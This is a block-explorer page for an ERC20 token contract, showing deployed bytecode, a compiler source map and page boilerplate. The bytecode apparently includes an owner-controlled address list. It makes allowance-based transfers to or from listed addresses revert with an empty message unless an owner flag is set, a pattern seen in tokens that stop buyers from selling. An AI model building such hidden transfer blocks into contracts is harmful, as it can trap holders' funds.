3505050565b6000610732848461055e565b9050600019811461079a578181101561078d5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161053a565b61079a8484848403610602565b6001600160a01b03841660009081526002602052604090205460ff16806107d957506001600160a01b03831660009081526002602052604090205460ff165b1561080f5760055460ff16151560011461080f5760405162461bcd60e51b8152602060048201526000602482015260440161053a565b50505050565b6001600160a01b0383166108795760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161053a565b6001600160a01b0382166108db5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161053a565b6001600160a01b038316600090815260016020526040902054818110156109535760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161053a565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b39086815260200190565b60405180910390a361080f565b6000546001600160a01b031633146104455760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161053a565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b0381168114610a8157600080fd5b919050565b60008060408385031215610a9957600080fd5b610aa283610a6a565b9150610ab060208401610a6a565b90509250929050565b600060208083528351808285015260005b81811015610ae657858101830151858201604001528201610aca565b506000604082860101526040601f19601f8301168501019250505092915050565b60008060408385031215610b1a57600080fd5b610b2383610a6a565b946020939093013593505050565b600060208284031215610b4357600080fd5b610b4c82610a6a565b9392505050565b600080600060608486031215610b6857600080fd5b610b7184610a6a565b9250610b7f60208501610a6a565b9150604084013590509250925092565b60008060208385031215610ba257600080fd5b823567ffffffffffffffff80821115610bba57600080fd5b818501915085601f830112610bce57600080fd5b813581811115610bdd57600080fd5b8660208260051b8501011115610bf257600080fd5b60209290920196919550909350505050565b600181811c90821680610c1857607f821691505b602082108103610c3857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b600060018201610c7c57610c7c610c54565b5060010190565b8082018082111561036857610368610c5456fea2646970667358221220ab5977e1e8d9c5535cfcecf9654dc71d9b2b33440a69319948402f4c4d1f7a0464736f6c63430008120033

Deployed Bytecode Sourcemap

20599:139:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8089:66;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;603:25:1;;;591:2;576:18;8089:66:0;;;;;;;;8808:100;;;:::i;:::-;;;;;;;:::i;11663:201::-;;;;;;:::i;:::-;;:::i;:::-;;;1616:14:1;;1609:22;1591:41;;1579:2;1564:18;11663:201:0;1451:187:1;10258:109:0;;;;;;:::i;:::-;-1:-1:-1;;;;;10343:16:0;10319:4;10343:16;;;:10;:16;;;;;;;;;10258:109;10432:108;10520:12;;10432:108;;12444:295;;;;;;:::i;:::-;;:::i;9871:188::-;;;;;;:::i;:::-;;:::i;:::-;;9770:93;;;9853:2;2929:36:1;;2917:2;2902:18;9770:93:0;2787:184:1;13148:238:0;;;;;;:::i;:::-;;:::i;10603:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10704:18:0;10677:7;10704:18;;;:9;:18;;;;;;;10603:127;5914:103;;;:::i;10067:183::-;;;;;;:::i;:::-;;:::i;5273:87::-;5319:7;5346:6;5273:87;;-1:-1:-1;;;;;5346:6:0;;;3122:51:1;;3110:2;3095:18;5273:87:0;2976:203:1;9027:104:0;;;:::i;13889:436::-;;;;;;:::i;:::-;;:::i;10936:193::-;;;;;;:::i;:::-;;:::i;11192:151::-;;;;;;:::i;:::-;;:::i;6172:201::-;;;;;;:::i;:::-;;:::i;8808:100::-;8862:13;8895:5;8888:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8808:100;:::o;11663:201::-;11746:4;4062:10;11802:32;4062:10;11818:7;11827:6;11802:8;:32::i;:::-;11852:4;11845:11;;;11663:201;;;;;:::o;12444:295::-;12575:4;4062:10;12633:38;12649:4;4062:10;12664:6;12633:15;:38::i;:::-;12682:27;12692:4;12698:2;12702:6;12682:9;:27::i;:::-;-1:-1:-1;12727:4:0;;12444:295;-1:-1:-1;;;;12444:295:0:o;9871:188::-;5159:13;:11;:13::i;:::-;9960:9:::1;9955:97;9975:16:::0;;::::1;9955:97;;;10036:4;10013:10;:20;10024:5;;10030:1;10024:8;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;10013:20:0::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;10013:20:0;:27;;-1:-1:-1;;10013:27:0::1;::::0;::::1;;::::0;;;::::1;::::0;;9993:3;::::1;::::0;::::1;:::i;:::-;;;;9955:97;;;;9871:188:::0;;:::o;13148:238::-;13236:4;4062:10;13292:64;4062:10;13308:7;13345:10;13317:25;4062:10;13308:7;13317:9;:25::i;:::-;:38;;;;:::i;:::-;13292:8;:64::i;5914:103::-;5159:13;:11;:13::i;:::-;5979:30:::1;6006:1;5979:18;:30::i;:::-;5914:103::o:0;10067:183::-;5159:13;:11;:13::i;:::-;10150:9:::1;10145:98;10165:16:::0;;::::1;10145:98;;;10226:5;10203:10;:20;10214:5;;10220:1;10214:8;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;10203:20:0::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;10203:20:0;:28;;-1:-1:-1;;10203:28:0::1;::::0;::::1;;::::0;;;::::1;::::0;;10183:3;::::1;::::0;::::1;:::i;:::-;;;;10145:98;;9027:104:::0;9083:13;9116:7;9109:14;;;;;:::i;13889:436::-;13982:4;4062:10;13982:4;14065:25;4062:10;14082:7;14065:9;:25::i;:::-;14038:52;;14129:15;14109:16;:35;;14101:85;;;;-1:-1:-1;;;14101:85:0;;4305:2:1;14101:85:0;;;4287:21:1;4344:2;4324:18;;;4317:30;4383:34;4363:18;;;4356:62;-1:-1:-1;;;4434:18:1;;;4427:35;4479:19;;14101:85:0;;;;;;;;;14222:60;14231:5;14238:7;14266:15;14247:16;:34;14222:8;:60::i;10936:193::-;11015:4;4062:10;11071:28;4062:10;11088:2;11092:6;11071:9;:28::i;11192:151::-;-1:-1:-1;;;;;11308:18:0;;;11281:7;11308:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11192:151::o;6172:201::-;5159:13;:11;:13::i;:::-;-1:-1:-1;;;;;6261:22:0;::::1;6253:73;;;::::0;-1:-1:-1;;;6253:73:0;;4711:2:1;6253:73:0::1;::::0;::::1;4693:21:1::0;4750:2;4730:18;;;4723:30;4789:34;4769:18;;;4762:62;-1:-1:-1;;;4840:18:1;;;4833:36;4886:19;;6253:73:0::1;4509:402:1::0;6253:73:0::1;6337:28;6356:8;6337:18;:28::i;:::-;6172:201:::0;:::o;17916:380::-;-1:-1:-1;;;;;18052:19:0;;18044:68;;;;-1:-1:-1;;;18044:68:0;;5118:2:1;18044:68:0;;;5100:21:1;5157:2;5137:18;;;5130:30;5196:34;5176:18;;;5169:62;-1:-1:-1;;;5247:18:1;;;5240:34;5291:19;;18044:68:0;4916:400:1;18044:68:0;-1:-1:-1;;;;;18131:21:0;;18123:68;;;;-1:-1:-1;;;18123:68:0;;5523:2:1;18123:68:0;;;5505:21:1;5562:2;5542:18;;;5535:30;5601:34;5581:18;;;5574:62;-1:-1:-1;;;5652:18:1;;;5645:32;5694:19;;18123:68:0;5321:398:1;18123:68:0;-1:-1:-1;;;;;18204:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18256:32;;603:25:1;;;18256:32:0;;576:18:1;18256:32:0;;;;;;;17916:380;;;:::o;18587:548::-;18722:24;18749:25;18759:5;18766:7;18749:9;:25::i;:::-;18722:52;;-1:-1:-1;;18789:16:0;:37;18785:248;;18871:6;18851:16;:26;;18843:68;;;;-1:-1:-1;;;18843:68:0;;5926:2:1;18843:68:0;;;5908:21:1;5965:2;5945:18;;;5938:30;6004:31;5984:18;;;5977:59;6053:18;;18843:68:0;5724:353:1;18843:68:0;18955:51;18964:5;18971:7;18999:6;18980:16;:25;18955:8;:51::i;:::-;-1:-1:-1;;;;;19047:17:0;;;;;;:10;:17;;;;;;;;;:40;;-1:-1:-1;;;;;;19068:19:0;;;;;;:10;:19;;;;;;;;19047:40;19043:84;;;19097:17;;;;:25;;:17;:25;19089:38;;;;-1:-1:-1;;;19089:38:0;;6284:2:1;19089:38:0;;;6266:21:1;-1:-1:-1;6303:18:1;;;6296:29;6342:18;;19089:38:0;6082:284:1;19089:38:0;18711:424;18587:548;;;:::o;14795:840::-;-1:-1:-1;;;;;14926:18:0;;14918:68;;;;-1:-1:-1;;;14918:68:0;;6573:2:1;14918:68:0;;;6555:21:1;6612:2;6592:18;;;6585:30;6651:34;6631:18;;;6624:62;-1:-1:-1;;;6702:18:1;;;6695:35;6747:19;;14918:68:0;6371:401:1;14918:68:0;-1:-1:-1;;;;;15005:16:0;;14997:64;;;;-1:-1:-1;;;14997:64:0;;6979:2:1;14997:64:0;;;6961:21:1;7018:2;6998:18;;;6991:30;7057:34;7037:18;;;7030:62;-1:-1:-1;;;7108:18:1;;;7101:33;7151:19;;14997:64:0;6777:399:1;14997:64:0;-1:-1:-1;;;;;15147:15:0;;15125:19;15147:15;;;:9;:15;;;;;;15181:21;;;;15173:72;;;;-1:-1:-1;;;15173:72:0;;7383:2:1;15173:72:0;;;7365:21:1;7422:2;7402:18;;;7395:30;7461:34;7441:18;;;7434:62;-1:-1:-1;;;7512:18:1;;;7505:36;7558:19;;15173:72:0;7181:402:1;15173:72:0;-1:-1:-1;;;;;15281:15:0;;;;;;;:9;:15;;;;;;15299:20;;;15281:38;;15499:13;;;;;;;;;;:23;;;;;;15551:26;;;;;;15313:6;603:25:1;;591:2;576:18;;457:177;15551:26:0;;;;;;;;15590:37;9871:188;5438:132;5319:7;5346:6;-1:-1:-1;;;;;5346:6:0;4062:10;5502:23;5494:68;;;;-1:-1:-1;;;5494:68:0;;7790:2:1;5494:68:0;;;7772:21:1;;;7809:18;;;7802:30;7868:34;7848:18;;;7841:62;7920:18;;5494:68:0;7588:356:1;6533:191:0;6607:16;6626:6;;-1:-1:-1;;;;;6643:17:0;;;-1:-1:-1;;;;;;6643:17:0;;;;;;6676:40;;6626:6;;;;;;;6676:40;;6607:16;6676:40;6596:128;6533:191;:::o;14:173:1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:70;;177:1;174;167:12;111:70;14:173;;;:::o;192:260::-;260:6;268;321:2;309:9;300:7;296:23;292:32;289:52;;;337:1;334;327:12;289:52;360:29;379:9;360:29;:::i;:::-;350:39;;408:38;442:2;431:9;427:18;408:38;:::i;:::-;398:48;;192:260;;;;;:::o;639:548::-;751:4;780:2;809;798:9;791:21;841:6;835:13;884:6;879:2;868:9;864:18;857:34;909:1;919:140;933:6;930:1;927:13;919:140;;;1028:14;;;1024:23;;1018:30;994:17;;;1013:2;990:26;983:66;948:10;;919:140;;;923:3;1108:1;1103:2;1094:6;1083:9;1079:22;1075:31;1068:42;1178:2;1171;1167:7;1162:2;1154:6;1150:15;1146:29;1135:9;1131:45;1127:54;1119:62;;;;639:548;;;;:::o;1192:254::-;1260:6;1268;1321:2;1309:9;1300:7;1296:23;1292:32;1289:52;;;1337:1;1334;1327:12;1289:52;1360:29;1379:9;1360:29;:::i;:::-;1350:39;1436:2;1421:18;;;;1408:32;;-1:-1:-1;;;1192:254:1:o;1643:186::-;1702:6;1755:2;1743:9;1734:7;1730:23;1726:32;1723:52;;;1771:1;1768;1761:12;1723:52;1794:29;1813:9;1794:29;:::i;:::-;1784:39;1643:186;-1:-1:-1;;;1643:186:1:o;1834:328::-;1911:6;1919;1927;1980:2;1968:9;1959:7;1955:23;1951:32;1948:52;;;1996:1;1993;1986:12;1948:52;2019:29;2038:9;2019:29;:::i;:::-;2009:39;;2067:38;2101:2;2090:9;2086:18;2067:38;:::i;:::-;2057:48;;2152:2;2141:9;2137:18;2124:32;2114:42;;1834:328;;;;;:::o;2167:615::-;2253:6;2261;2314:2;2302:9;2293:7;2289:23;2285:32;2282:52;;;2330:1;2327;2320:12;2282:52;2370:9;2357:23;2399:18;2440:2;2432:6;2429:14;2426:34;;;2456:1;2453;2446:12;2426:34;2494:6;2483:9;2479:22;2469:32;;2539:7;2532:4;2528:2;2524:13;2520:27;2510:55;;2561:1;2558;2551:12;2510:55;2601:2;2588:16;2627:2;2619:6;2616:14;2613:34;;;2643:1;2640;2633:12;2613:34;2696:7;2691:2;2681:6;2678:1;2674:14;2670:2;2666:23;2662:32;2659:45;2656:65;;;2717:1;2714;2707:12;2656:65;2748:2;2740:11;;;;;2770:6;;-1:-1:-1;2167:615:1;;-1:-1:-1;;;;2167:615:1:o;3184:380::-;3263:1;3259:12;;;;3306;;;3327:61;;3381:4;3373:6;3369:17;3359:27;;3327:61;3434:2;3426:6;3423:14;3403:18;3400:38;3397:161;;3480:10;3475:3;3471:20;3468:1;3461:31;3515:4;3512:1;3505:15;3543:4;3540:1;3533:15;3397:161;;3184:380;;;:::o;3569:127::-;3630:10;3625:3;3621:20;3618:1;3611:31;3661:4;3658:1;3651:15;3685:4;3682:1;3675:15;3701:127;3762:10;3757:3;3753:20;3750:1;3743:31;3793:4;3790:1;3783:15;3817:4;3814:1;3807:15;3833:135;3872:3;3893:17;;;3890:43;;3913:18;;:::i;:::-;-1:-1:-1;3960:1:1;3949:13;;3833:135::o;3973:125::-;4038:9;;;4059:10;;;4056:36;;;4072:18;;:::i

Swarm Source

ipfs://ab5977e1e8d9c5535cfcecf9654dc71d9b2b33440a69319948402f4c4d1f7a04
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.